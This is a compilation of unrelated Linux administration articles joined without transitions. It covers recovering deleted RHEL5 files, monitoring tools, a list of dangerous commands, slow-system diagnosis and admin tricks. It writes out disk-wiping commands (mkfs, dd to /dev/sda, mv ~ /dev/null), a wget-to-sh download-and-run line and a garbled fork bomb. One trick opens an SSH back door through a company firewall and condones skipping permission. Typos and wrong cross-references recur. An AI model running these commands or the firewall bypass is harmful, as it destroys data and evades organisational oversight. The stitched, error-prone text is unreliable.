Everything seems fine when your Linux machine works just the way you want it to. But that feeling changes dramatically when your machine starts creating problems that you find really difficult to sort out. Not everyone can troubleshoot a Linux machine efficiently… but you can, if you are ready to stay with us for the next few minutes. Let’s look at what to do when some of your important system files are deleted or corrupted under Red Hat Enterprise Linux 5. The action begins now!
Scene 1: /etc/passwd is deleted
This is an important file in Linux as it contains information about user accounts and passwords. If it’s missing in your system and you try to log in to a user account, you get an error message stating Log-in incorrect and after restarting the system.

Now that you have seen the problem and its consequences, it’s time to solve it. Boot into single user mode. At the start of booting, press any key to enter into the GRUB menu. Here you will see a list of the operating systems installed. Just select the one you are working with and press.

It’s time to have some fun with kernel parameters. So highlight the kernel and again press e to edit its parameters.
Next, instruct the kernel to boot into single user mode, which is also known as maintenance mode. Just type 1 after a space and press the Enter key. Now press b to continue the booting process.
Now that you have booted into single user mode, you are probably asking yourself, What is next?. The tricky portion of this exercise is now over and it takes just one command to have your passwd file in its place. Actually, there is a file /etc/passwd-, which is nothing but the backup file for /etc/passwd. So all you need to do is to issue the following command:

cp /etc/passwd- /etc/passwd

…and you are done. Now you can issue the init 5 command to switch to the graphical mode. Everything is fine now. You can also find the backup of /etc/shadow and /etc/gshadow as /etc/shadow- and /etc/gshadow- respectively.
Scene 2: /etc/pam.d/login is deleted
If your /etc/pam.d/login file is deleted and you try to log in, it won’t ask you to enter your password after entering your username. Instead, it will continuously show the localhost login prompt. Here again, there is a single command that will solve the problem for you:

cp /etc/pam.d/system-auth /etc/pam.d/login

Just boot into the single user mode as done earlier, type this command and you’ll be able to log in normally. There is also a second solution to this problem, which we’ll look at after a while.
Scene 3: /etc/inittab is deleted
We know that in Linux, init is the first process to be started and it starts all the other processes. The /etc/inittab file contains instructions for the init process and if it’s missing, then no further process can be launched. On starting a system with no inittab file, it will show the following message:

INIT:No inittab file found …and will ask you to enter a runlevel. When you do that, it again shows the message that no more processes are left in this runlevel.
Fixing this problem is not easy because being in the single user mode doesn’t help in this case. Here, you need the Linux rescue environment to fix this problem. So set your first boot device to CD and boot with the RHEL5 CD. At the boot prompt, type ‘Linux rescue’ to enter the rescue environment.
Once you have entered into the rescue environment, your system will be mounted under /mnt/sysimage. Here, reinstall the package that provides the /etc/inittab file. The overall process is given below:
chroot /mnt/sysimage
rpm -q –whatprovides /etc/inittab
mkdir /a
mount /dev/hdc /a

Here /dev/hdc is the path of the CD. It may vary on your system, though.

rpm –Uvh –force /a/Server/initscripts-8.45.25-1.el5.i386.rpm

You can also hit the Tab key after init to auto complete the name.
Now you’ll get your /etc/inittab file back. The same procedure can be applied to recover the /etc/pam.d/login file. In this case, you’ll have to install the util-linux package. Once you are done with it, type Exit to leave the rescue environment, set your first boot device to hard disk and boot normally.

Scene 4: /boot/grub/grub.conf is deleted

This file is the configuration file of the GRUB boot loader. If it is deleted and you start your machine, you will see a GRUB prompt that indicates that grub.conf is missing and there is no further instruction for GRUB to carry on its operation.
But don’t worry, as we’ll solve this problem, too, in the next few minutes. You don’t even need to enter single user mode or the Linux rescue environment for this. At the GRUB prompt, you can enter some command that can make your system boot. So here we go: Type root (and hit Tab to find out the hard disks attached to the system. In my case, I got hd0 and fd0—the hard disk and floppy disk, respectively). Now we know that GRUB is stored in the first sector of a hard disk, which is hd0,0. So the complete command would be root (hd0,0). Enter this command and press the Enter key to carry on.
You now need to find out the kernel image file. So enter kernel /v and hit Tab to auto complete it. In my system, it’s vmlinuz-2.6.18-128.el5. Please note it down as we’ll require this information further, and then press Enter.
Next, let’s figure out the initrd image file. So enter initrd /i and press Tab to auto complete it. For me, it’s initrd-2.6.18-128.el5.img. Again note it down and press Enter.
Type boot and press Enter, and the system will boot normally.
Now it’s time to create a grub.conf file manually. So create the /boot/grub/grub.conf file and enter the following data in it:

splashimage=(hd0,0)/grub/splash.xpm.gz
default=0
timeout=5
title Red Hat
root (hd0,0)
kernel /vmlinuz-2.6.18-128.el5
initrd /initrd-26.18-128.el5.img

Save the file and quit it. You have created a grub.conf file manually to resolve the problem. Don’t forget that the kernel and the initrd image file name may vary on your system. That’s why I asked you to note them down earlier. You can also find them in the /boot folder once you are logged in it’s not a big issue.

1. Finding out bottlenecks.
2. Disk (storage) bottlenecks.
3. CPU and memory bottlenecks.
4. Network bottlenecks.

#1: top – Process Activity Command

The top program provides a dynamic real-time view of a running system i.e. actual process activity. By default, it displays the most CPU-intensive tasks running on the server and updates the list every five seconds.

Fig.01: Linux top command

Commonly Used Hot Keys

The top command provides several useful hot keys:

#2: vmstat – System Activity, Hardware and System Information

The command vmstat reports information about processes, memory, paging, block IO, traps, and cpu activity.
# vmstat 3
Sample Outputs:

procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 0  0      0 2540988 522188 5130400    0    0     2    32    4    2  4  1 96  0  0
 1  0      0 2540988 522188 5130400    0    0     0   720 1199  665  1  0 99  0  0
 0  0      0 2540956 522188 5130400    0    0     0     0 1151 1569  4  1 95  0  0
 0  0      0 2540956 522188 5130500    0    0     0     6 1117  439  1  0 99  0  0
 0  0      0 2540940 522188 5130512    0    0     0   536 1189  932  1  0 98  0  0
 0  0      0 2538444 522188 5130588    0    0     0     0 1187 1417  4  1 96  0  0
 0  0      0 2490060 522188 5130640    0    0     0    18 1253 1123  5  1 94  0  0

Display Memory Utilization Slabinfo

# vmstat -m

Get Information About Active / Inactive Memory Pages

# vmstat -a

#3: w – Find Out Who Is Logged on And What They Are Doing

w command displays information about the users currently on the machine, and their processes.
# w username
# w vivek
Sample Outputs:

 17:58:47 up 5 days, 20:28,  2 users,  load average: 0.36, 0.26, 0.24
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    10.1.3.145       14:55    5.00s  0.04s  0.02s vim /etc/resolv.conf
root     pts/1    10.1.3.145       17:43    0.00s  0.03s  0.00s w

#4: uptime – Tell How Long The System Has Been Running

The uptime command can be used to see how long the server has been running. The current time, how long the system has been running, how many users are currently logged on, and the system load averages for the past 1, 5, and 15 minutes.
# uptime
Output:

 18:02:41 up 41 days, 23:42,  1 user,  load average: 0.00, 0.00, 0.00

1 can be considered as optimal load value. The load can change from system to system. For a single CPU system 1 – 3 and SMP systems 6-10 load value might be acceptable.

#5: ps – Displays The Processes

ps command will report a snapshot of the current processes. To select all processes use the -A or -e option:
# ps -A
Sample Outputs:

  PID TTY          TIME CMD
    1 ?        00:00:02 init
    2 ?        00:00:02 migration/0
    3 ?        00:00:01 ksoftirqd/0
    4 ?        00:00:00 watchdog/0
    5 ?        00:00:00 migration/1
    6 ?        00:00:15 ksoftirqd/1
....
.....
 4881 ?        00:53:28 java
 4885 tty1     00:00:00 mingetty
 4886 tty2     00:00:00 mingetty
 4887 tty3     00:00:00 mingetty
 4888 tty4     00:00:00 mingetty
 4891 tty5     00:00:00 mingetty
 4892 tty6     00:00:00 mingetty
 4893 ttyS1    00:00:00 agetty
12853 ?        00:00:00 cifsoplockd
12854 ?        00:00:00 cifsdnotifyd
14231 ?        00:10:34 lighttpd
14232 ?        00:00:00 php-cgi
54981 pts/0    00:00:00 vim
55465 ?        00:00:00 php-cgi
55546 ?        00:00:00 bind9-snmp-stat
55704 pts/1    00:00:00 ps

ps is just like top but provides more information.

Show Long Format Output

# ps -Al
To turn on extra full mode (it will show command line arguments passed to process):
# ps -AlF

To See Threads ( LWP and NLWP)

# ps -AlFH

To See Threads After Processes

# ps -AlLm

Print All Process On The Server

# ps ax
# ps axu

Print A Process Tree

# ps -ejH
# ps axjf
# pstree

Print Security Information

# ps -eo euser,ruser,suser,fuser,f,comm,label
# ps axZ
# ps -eM

See Every Process Running As User Vivek

# ps -U vivek -u vivek u

Set Output In a User-Defined Format

# ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:14,comm
# ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm
# ps -eopid,tt,user,fname,tmout,f,wchan

Display Only The Process IDs of Lighttpd

# ps -C lighttpd -o pid=
OR
# pgrep lighttpd
OR
# pgrep -u vivek php-cgi

Display The Name of PID 55977

# ps -p 55977 -o comm=

Find Out The Top 10 Memory Consuming Process

# ps -auxf | sort -nr -k 4 | head -10

Find Out top 10 CPU Consuming Process

# ps -auxf | sort -nr -k 3 | head -10

#6: free – Memory Usage

The command free displays the total amount of free and used physical and swap memory in the system, as well as the buffers used by the kernel.
# free
Sample Output:

            total       used       free     shared    buffers     cached
Mem:      12302896    9739664    2563232          0     523124    5154740
-/+ buffers/cache:    4061800    8241096
Swap:      1052248          0    1052248

#7: iostat – Average CPU Load, Disk Activity

The command iostat report Central Processing Unit (CPU) statistics and input/output statistics for devices, partitions and network filesystems (NFS).
# iostat
Sample Outputs:

Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 	06/26/2009
avg-cpu:  %user   %nice %system %iowait  %steal   %idle
           3.50    0.09    0.51    0.03    0.00   95.86
Device:            tps   Blk_read/s   Blk_wrtn/s   Blk_read   Blk_wrtn
sda              22.04        31.88       512.03   16193351  260102868
sda1              0.00         0.00         0.00       2166        180
sda2             22.04        31.87       512.03   16189010  260102688
sda3              0.00         0.00         0.00       1615          0

#8: sar – Collect and Report System Activity

The sar command is used to collect, report, and save system activity information. To see network counter, enter:
# sar -n DEV | more
To display the network counters from the 24th:
# sar -n DEV -f /var/log/sa/sa24 | more
You can also display real time usage using sar:
# sar 4 5
Sample Outputs:

Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 		06/26/2009
06:45:12 PM       CPU     %user     %nice   %system   %iowait    %steal     %idle
06:45:16 PM       all      2.00      0.00      0.22      0.00      0.00     97.78
06:45:20 PM       all      2.07      0.00      0.38      0.03      0.00     97.52
06:45:24 PM       all      0.94      0.00      0.28      0.00      0.00     98.78
06:45:28 PM       all      1.56      0.00      0.22      0.00      0.00     98.22
06:45:32 PM       all      3.53      0.00      0.25      0.03      0.00     96.19
Average:          all      2.02      0.00      0.27      0.01      0.00     97.70

#9: mpstat – Multiprocessor Usage

The mpstat command displays activities for each available processor, processor 0 being the first one. mpstat -P ALL to display average CPU utilization per processor:
# mpstat -P ALL
Sample Output:

Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in)	 	06/26/2009
06:48:11 PM  CPU   %user   %nice    %sys %iowait    %irq   %soft  %steal   %idle    intr/s
06:48:11 PM  all    3.50    0.09    0.34    0.03    0.01    0.17    0.00   95.86   1218.04
06:48:11 PM    0    3.44    0.08    0.31    0.02    0.00    0.12    0.00   96.04   1000.31
06:48:11 PM    1    3.10    0.08    0.32    0.09    0.02    0.11    0.00   96.28     34.93
06:48:11 PM    2    4.16    0.11    0.36    0.02    0.00    0.11    0.00   95.25      0.00
06:48:11 PM    3    3.77    0.11    0.38    0.03    0.01    0.24    0.00   95.46     44.80
06:48:11 PM    4    2.96    0.07    0.29    0.04    0.02    0.10    0.00   96.52     25.91
06:48:11 PM    5    3.26    0.08    0.28    0.03    0.01    0.10    0.00   96.23     14.98
06:48:11 PM    6    4.00    0.10    0.34    0.01    0.00    0.13    0.00   95.42      3.75
06:48:11 PM    7    3.30    0.11    0.39    0.03    0.01    0.46    0.00   95.69     76.89

#10: pmap – Process Memory Usage

The command pmap report memory map of a process. Use this command to find out causes of memory bottlenecks.
# pmap -d PID
To display process memory information for pid # 47394, enter:
# pmap -d 47394
Sample Outputs:

47394:   /usr/bin/php-cgi
Address           Kbytes Mode  Offset           Device    Mapping
0000000000400000    2584 r-x-- 0000000000000000 008:00002 php-cgi
0000000000886000     140 rw--- 0000000000286000 008:00002 php-cgi
00000000008a9000      52 rw--- 00000000008a9000 000:00000   [ anon ]
0000000000aa8000      76 rw--- 00000000002a8000 008:00002 php-cgi
000000000f678000    1980 rw--- 000000000f678000 000:00000   [ anon ]
000000314a600000     112 r-x-- 0000000000000000 008:00002 ld-2.5.so
000000314a81b000       4 r---- 000000000001b000 008:00002 ld-2.5.so
000000314a81c000       4 rw--- 000000000001c000 008:00002 ld-2.5.so
000000314aa00000    1328 r-x-- 0000000000000000 008:00002 libc-2.5.so
000000314ab4c000    2048 ----- 000000000014c000 008:00002 libc-2.5.so
.....
......
..
00002af8d48fd000       4 rw--- 0000000000006000 008:00002 xsl.so
00002af8d490c000      40 r-x-- 0000000000000000 008:00002 libnss_files-2.5.so
00002af8d4916000    2044 ----- 000000000000a000 008:00002 libnss_files-2.5.so
00002af8d4b15000       4 r---- 0000000000009000 008:00002 libnss_files-2.5.so
00002af8d4b16000       4 rw--- 000000000000a000 008:00002 libnss_files-2.5.so
00002af8d4b17000  768000 rw-s- 0000000000000000 000:00009 zero (deleted)
00007fffc95fe000      84 rw--- 00007ffffffea000 000:00000   [ stack ]
ffffffffff600000    8192 ----- 0000000000000000 000:00000   [ anon ]
mapped: 933712K    writeable/private: 4304K    shared: 768000K

The last line is very important:

• mapped: 933712K total amount of memory mapped to files
• writeable/private: 4304K the amount of private address space
• shared: 768000K the amount of address space this process is sharing with others

#11 and #12: netstat and ss – Network Statistics

The command netstat displays network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. ss command is used to dump socket statistics. It allows showing information similar to netstat.

#13: iptraf – Real-time Network Statistics

The iptraf command is interactive colorful IP LAN monitor. It is an ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others. It can provide the following info in easy to read format:

• Network traffic statistics by TCP connection
• IP traffic statistics by network interface
• Network traffic statistics by protocol
• Network traffic statistics by TCP/UDP port and by packet size
• Network traffic statistics by Layer2 address

Fig.02: General interface statistics: IP traffic statistics by network interface

Fig.03 Network traffic statistics by TCP connection

#14: tcpdump – Detailed Network Traffic Analysis

The tcpdump is simple command that dump traffic on a network. However, you need good understanding of TCP/IP protocol to utilize this tool. For.e.g to display traffic info about DNS, enter:
# tcpdump -i eth1 'udp port 53'
To display all IPv4 HTTP packets to and from port 80, i.e. print only packets that contain data, not, for example, SYN and FIN packets and ACK-only packets, enter:
# tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
To display all FTP session to 202.54.1.5, enter:
# tcpdump -i eth1 'dst 202.54.1.5 and (port 21 or 20'
To display all HTTP session to 192.168.1.5:
# tcpdump -ni eth0 'dst 192.168.1.5 and tcp and port http'
Use wireshark to view detailed information about files, enter:
# tcpdump -n -i eth1 -s 0 -w output.txt src or dst port 80

#15: strace – System Calls

Trace system calls and signals. This is useful for debugging webserver and other server problems. See how to use to trace the process and see What it is doing.

#16: /Proc file system – Various Kernel Statistics

/proc file system provides detailed information about various hardware devices and other Linux kernel information.

Common /proc examples:
# cat /proc/cpuinfo
# cat /proc/meminfo
# cat /proc/zoneinfo
# cat /proc/mounts

17#: Nagios – Server And Network Monitoring

Nagios is a popular open source computer system and network monitoring application software. You can easily monitor all your hosts, network equipment and services. It can send alert when things go wrong and again when they get better. FAN is “Fully Automated Nagios”. FAN goals are to provide a Nagios installation including most tools provided by the Nagios Community. FAN provides a CDRom image in the standard ISO format, making it easy to easilly install a Nagios server. Added to this, a wide bunch of tools are including to the distribution, in order to improve the user experience around Nagios.

18#: Cacti – Web-based Monitoring Tool

Cacti is a complete network graphing solution designed to harness the power of RRDTool’s data storage and graphing functionality. Cacti provides a fast poller, advanced graph templating, multiple data acquisition methods, and user management features out of the box. All of this is wrapped in an intuitive, easy to use interface that makes sense for LAN-sized installations up to complex networks with hundreds of devices. It can provide data about network, CPU, memory, logged in users, Apache, DNS servers and much more.

#19: KDE System Guard – Real-time Systems Reporting and Graphing

KSysguard is a network enabled task and system monitor application for KDE desktop. This tool can be run over ssh session. It provides lots of features such as a client/server architecture that enables monitoring of local and remote hosts. The graphical front end uses so-called sensors to retrieve the information it displays. A sensor can return simple values or more complex information like tables. For each type of information, one or more displays are provided. Displays are organized in worksheets that can be saved and loaded independently from each other. So, KSysguard is not only a simple task manager but also a very powerful tool to control large server farms.

Fig.05 KDE System Guard {Image credit: Wikipedia}

#20: Gnome System Monitor – Real-time Systems Reporting and Graphing

The System Monitor application enables you to display basic system information and monitor system processes, usage of system resources, and file systems. You can also use System Monitor to modify the behavior of your system. Although not as powerful as the KDE System Guard, it provides the basic information which may be useful for new users:

• Displays various basic information about the computer’s hardware and software.
• Linux Kernel version
• GNOME version
• Hardware
• Installed memory
• Processors and speeds
• System Status
• Currently available disk space
• Processes
• Memory and swap space
• Network usage
• File Systems
• Lists all mounted filesystems along with basic information about each.

Fig.06 The Gnome System Monitor application

Bonus: Additional Tools

A few more tools:

• nmap – scan your server for open ports.
• lsof – list open files, network connections and much more.
• ntop web based tool – ntop is the best tool to see network usage in a way similar to what top command does for processes i.e. it is network traffic monitoring software. You can see network status, protocol wise distribution of traffic for UDP, TCP, DNS, HTTP and other protocols.
• Conky – Another good monitoring tool for the X Window System. It is highly configurable and is able to monitor many system variables including the status of the CPU, memory, swap space, disk storage, temperatures, processes, network interfaces, battery power, system messages, e-mail inboxes etc.
• GKrellM – It can be used to monitor the status of CPUs, main memory, hard disks, network interfaces, local and remote mailboxes, and many other things.
• vnstat – vnStat is a console-based network traffic monitor. It keeps a log of hourly, daily and monthly network traffic for the selected interface(s).
• htop – htop is an enhanced version of top, the interactive process viewer, which can display the list of processes in a tree form.
• mtr – mtr combines the functionality of the traceroute and ping programs in a single network diagnostic tool.

Did I miss something? Please add your favorite system motoring tool in the comments.

Learning the commands you shouldn’t run can help protect you from trolls while increasing your understanding of how Linux works. This isn’t an exhaustive guide, and the commands here can be remixed in a variety of ways.

Note that many of these commands will only be dangerous if they’re prefixed with sudo on Ubuntu – they won’t work otherwise. On other Linux distributions, most commands must be run as root.

){ : & };: – Fork Bomb

The following line is a simple-looking, but dangerous, bash function:

){ : & };:

This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.

The Lesson: Bash functions are powerful, even very short ones.

mkfs.ext4 /dev/sda1 – Formats a Hard Drive

The mkfs.ext4 /dev/sda1 command is simple to understand:

mkfs.ext4 – Create a new ext4 file system on the following device.

/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.

Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.

This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.

The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.

command > /dev/sda – Writes Directly to a Hard Drive

The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.

command – Run a command (can be any command.)

> – Send the output of the command to the following location.

/dev/sda – Write the output of the command directly to the hard disk device.

The Lesson: As above, beware running commands that involve hard disk devices beginning with /dev/sd.

dd if=/dev/random of=/dev/sda – Writes Junk Onto a Hard Drive

The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.

dd – Perform low-level copying from one location to another.

if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).

of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.

The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.

mv ~ /dev/null – Moves Your Home Directory to a Black Hole

/dev/null is another special location – moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole.

mv – Move the following file or directory to another location.

~ – Represents your entire home folder.

/dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.

The Lesson: The ~ character represents your home folder and moving things to /dev/null destroys them.

wget http://example.com/something -O – | sh – Downloads and Runs a Script

The above line downloads a script from the web and sends it to sh,which executes the contents of the script. This can be dangerous if you’re not sure what the script is or if you don’t trust its source – don’t run untrusted scripts.

wget – Downloads a file. (You may also see curl in place of wget.)

http://example.com/something – Download the file from this location.

| – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.

sh – Send the file to the sh command, which executes it if it’s a bash script.

The Lesson: Don’t download and run untrusted scripts from the web, even with a command.

Know any other dangerous commands that new (and experienced) Linux users shouldn’t run? Leave a comment and share them!

I think it’s safe to say that most people familiar with both Linux and Windows would tell you that your average Linux install would outperform an equivalent Windows install on the same machine.Computer users expect their systems to work well at all times, but unfortunately this isn’t always the case. If your system becomes slow, there certainly is something you can do about it. So let’s see why it happens or how u can check it !!!

CPU Load

We’ll start with the most obvious cause of PC slowness – processor overload. As you’re reading this website, it’s got various bits of JavaScript running. Each time you load the page, the JavaScript is read as text, interpreted by your browser, passed to your operating system which loads system libraries and passes the data to your kernel – which works through the hardware drivers to actually run the program through your CPU. We get the convenience of being able to have a single script run on nearly every computer, but all that interpretation and data passing can really hammer down your system performance.

The most basic way to check your CPU load is with the command-line utility top. It contains a lot of information, but it really shines when trying to make comparisons between the CPU and RAM usage of various applications.

In that screenshot, you can see that top sorts the entries with the highest usage on top, so that you can see right away what’s using the most CPU or RAM, and the result is shown in percentages.

It’s worth noting that on a machine with multiple cores, it’s quite possible that the percentages top shows you will total up to more than 100% (ie, one core is 70% of max and another is 60%, top might show 130% usage).

RAM Usage

Next to CPU, your RAM (or lack thereof) is the mostly likely culprit of performance problems. Most MakeTechEasier readers are probably familiar with how RAM works, but here’s a quick primer for those who don’t.

Let’s say you’re at a library, and the new Larry Porter and the Prince of Bologna book is out. Normally, fantasy books are kept in the basement, but these books are hugely popular, so the library staff keeps a stack of them right at the front desk. This means that the library patrons can grab their book quickly and easily without going to the basement, it’s a win-win for everyone. That all sounds great, but you can’t do that with EVERY book in the library. Since the staff cannot keep a single convenient shelf for every book they have, most of them get kept in sections such as the basement.

That’s similar to how hard drives and RAM work. The hard drive, in this analogy, would be the basement shelves. It’s well suited to long-term, organized storage. The RAM is the smaller area by the front desk, and space specifically suited to hold the most needed items so that they can be retrieved quickly.

If you’ve got too much in your RAM (too many programs and services running) then the computer’s ability to retrieve the needed information can be drastically reduced. Suddenly it’s got to sort through a giant stack of stuff instead of just grabbing what it needs.

While it’s true that the free command will give you basic memory info, this is another case where top can come in very handy. Instead of simply showing “X mb free”, top will give you the detailed numbers, percentages, and swap usage information.

Take note of the swap usage information. On an average desktop, the percentage of used swap space should generally be very low. If it’s not, you may have to just go out and buy more RAM (or seriously reduce the amount of running programs.)

Overworked Hard Drive

Is your hard drive light constantly chugging along, yet you have no idea what it’s doing? Mysterious input/output can sure be a problem, so there is a top-like tool called iotop specifically meant to help diagnose this kind of problem.

It is not, however, built in to many distributions so you’ll likely have to install it separately. It should be available in your distro’s repositories.

A normal, idle system should be mostly zeros across the board, sometimes with a few small bursts while data is being written, as in the screenshot below.

If however, you run a disk-intensive utility like find, you’ll see its name and throughput listed clearly in iotop.

Now, you can easily find out what program is using your I/O (in this case I ran “find / -name chicken”), who ran it, the speed the data is being read, and more.

GUI Tools

The author of this post chose command line tools to gather this information for two main reasons. First, CLI tools generally require fewer resources than GUI tools, and second, tools like top can be found in just about any Linux system, where as GUI tools can be hit-or-miss.

Many people do not like the command line, and there are several GUI tools to perform system monitoring, but this author recommends Gnome System Monitor. It’s already available on just about any Gnome-based distribution, and includes a lot of useful information including realtime graphs for CPU, memory, and network.

Conclusion

While there are many things that can potentially cause system slowness those three things (CPU, RAM, and disk I/O) are behind the vast majority of performance problems. Using the tools described here won’t solve your performance problem, but they’ll make the cause of the problem a whole lot easier to find.

 The trick is to prove your efficiency to management. While I won’t attempt to cover that trick in this article, I will give you 10 essential gems from the lazy admin’s bag of tricks. These tips will save you time—and even if you don’t get paid more money to be more efficient, you’ll at least have more time to play an Action Game.

Trick 1: Unmounting the unresponsive DVD drive

The newbie states that when he pushes the Eject button on the DVD drive of a server running a certain Redmond-based operating system, it will eject immediately. He then complains that, in most enterprise Linux servers, if a process is running in that directory, then the ejection won’t happen. For too long as a Linux administrator, I would reboot the machine and get my disk on the bounce if I couldn’t figure out what was running and why it wouldn’t release the DVD drive. But this is ineffective.

Here’s how you find the process that holds your DVD drive and eject it to your heart’s content: First, simulate it. Stick a disk in your DVD drive, open up a terminal, and mount the DVD drive:

# mount /media/cdrom
# cd /media/cdrom
# while [ 1 ]; do echo “All your drives are belong to us!”; sleep 30; done

Now open up a second terminal and try to eject the DVD drive:

# eject

You’ll get a message like:

umount: /media/cdrom: device is busy

Before you free it, let’s find out who is using it.

# fuser /media/cdrom

You see the process was running and, indeed, it is our fault we can not eject the disk.

Now, if you are root, you can exercise your godlike powers and kill processes:

# fuser -k /media/cdrom

Boom! Just like that, freedom. Now solemnly unmount the drive:

# eject

fuser is good.

Trick 2: Getting your screen back when it’s hosed

Try this:

# cat /bin/cat

Behold! Your terminal looks like garbage. Everything you type looks like you’re looking into the Matrix. What do you do?

You type reset. But wait you say, typing reset is too close to typing reboot or shutdown. Your palms start to sweat—especially if you are doing this on a production machine.

Rest assured: You can do it with the confidence that no machine will be rebooted. Go ahead, do it:

# reset

Now your screen is back to normal. This is much better than closing the window and then logging in again, especially if you just went through five machines to SSH to this machine.

Trick 3: Collaboration with screen

David, the high-maintenance user from product engineering, calls: “I need you to help me understand why I can’t compile supercode.c on these new machines you deployed.”

“Fine,” you say. “What machine are you on?”

David responds: ” Posh.” (Yes, this fictional company has named its five production servers in honor of the Spice Girls.) OK, you say. You exercise your godlike root powers and on another machine become David:

# su – david

Then you go over to posh:

# ssh posh

Once you are there, you run:

# screen -S foo

Then you holler at David:

“Hey David, run the following command on your terminal: # screen -x foo.”

This will cause your and David’s sessions to be joined together in the holy Linux shell. You can type or he can type, but you’ll both see what the other is doing. This saves you from walking to the other floor and lets you both have equal control. The benefit is that David can watch your troubleshooting skills and see exactly how you solve problems.

At last you both see what the problem is: David’s compile script hard-coded an old directory that does not exist on this new server. You mount it, recompile, solve the problem, and David goes back to work. You then go back to whatever lazy activity you were doing before.

The one caveat to this trick is that you both need to be logged in as the same user. Other cool things you can do with the screen command include having multiple windows and split screens. Read the man pages for more on that.

But I’ll give you one last tip while you’re in your screen session. To detach from it and leave it open, type: Ctrl-A D . (I mean, hold down the Ctrl key and strike the A key. Then push the D key.)

You can then reattach by running the screen -x foo command again.

Trick 4: Getting back the root password

You forgot your root password. Nice work. Now you’ll just have to reinstall the entire machine. Sadly enough, I’ve seen more than a few people do this. But it’s surprisingly easy to get on the machine and change the password. This doesn’t work in all cases (like if you made a GRUB password and forgot that too), but here’s how you do it in a normal case with a Cent OS Linux example.

First reboot the system. When it reboots you’ll come to the GRUB screen as shown in Figure 1. Move the arrow key so that you stay on this screen instead of proceeding all the way to a normal boot.

Figure 1. GRUB screen after reboot

Next, select the kernel that will boot with the arrow keys, and type E to edit the kernel line. You’ll then see something like Figure 2:

Figure 2. Ready to edit the kernel line

Use the arrow key again to highlight the line that begins with kernel, and press E to edit the kernel parameters. When you get to the screen shown in Figure 3, simply append the number 1 to the arguments as shown in Figure 3:

Figure 3. Append the argument with the number 1

Then press Enter, B, and the kernel will boot up to single-user mode. Once here you can run the passwd command, changing password for user root:

sh-3.00# passwd
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

Now you can reboot, and the machine will boot up with your new password.

Trick 5: SSH back door

Many times I’ll be at a site where I need remote support from someone who is blocked on the outside by a company firewall. Few people realize that if you can get out to the world through a firewall, then it is relatively easy to open a hole so that the world can come into you.

In its crudest form, this is called “poking a hole in the firewall.” I’ll call it an SSH back door. To use it, you’ll need a machine on the Internet that you can use as an intermediary.

In our example, we’ll call our machine blackbox.example.com. The machine behind the company firewall is called ginger. Finally, the machine that technical support is on will be called tech. Figure 4 explains how this is set up.

Figure 4. Poking a hole in the firewall

Here’s how to proceed:
Check that what you’re doing is allowed, but make sure you ask the right people. Most people will cringe that you’re opening the firewall, but what they don’t understand is that it is completely encrypted. Furthermore, someone would need to hack your outside machine before getting into your company. Instead, you may belong to the school of “ask-for-forgiveness-instead-of-permission.” Either way, use your judgment and don’t blame me if this doesn’t go your way.

SSH from ginger to blackbox.example.com with the -R flag. I’ll assume that you’re the root user on ginger and that tech will need the root user ID to help you with the system. With the -R flag, you’ll forward instructions of port 2222 on blackbox to port 22 on ginger. This is how you set up an SSH tunnel. Note that only SSH traffic can come into ginger: You’re not putting ginger out on the Internet naked.

You can do this with the following syntax:

~# ssh -R 2222:localhost:22 thedude@blackbox.example.com

Once you are into blackbox, you just need to stay logged in. I usually enter a command like:

thedude@blackbox:~$ while [ 1 ]; do date; sleep 300; done

to keep the machine busy. And minimize the window.
Now instruct your friends at tech to SSH as thedude into blackbox without using any special SSH flags. You’ll have to give them your password:

root@tech:~# ssh thedude@blackbox.example.com .
Once tech is on the blackbox, they can SSH to ginger using the following command:

thedude@blackbox:~$: ssh -p 2222 root@localhost
Tech will then be prompted for a password. They should enter the root password of ginger.

Now you and support from tech can work together and solve the problem. You may even want to use screen together! (See Trick 4.)

Back to top

Trick 6: Remote VNC session through an SSH tunnel

VNC or virtual network computing has been around a long time. I typically find myself needing to use it when the remote server has some type of graphical program that is only available on that server.

For example, suppose in Trick 5, ginger is a storage server. Many storage devices come with a GUI program to manage the storage controllers. Often these GUI management tools need a direct connection to the storage through a network that is at times kept in a private subnet. Therefore, the only way to access this GUI is to do it from ginger.

You can try SSH’ing to ginger with the -X option and launch it that way, but many times the bandwidth required is too much and you’ll get frustrated waiting. VNC is a much more network-friendly tool and is readily available for nearly all operating systems.

Let’s assume that the setup is the same as in Trick 5, but you want tech to be able to get VNC access instead of SSH. In this case, you’ll do something similar but forward VNC ports instead. Here’s what you do:
Start a VNC server session on ginger. This is done by running something like:

root@ginger:~# vncserver -geometry 1024×768 -depth 24 :99

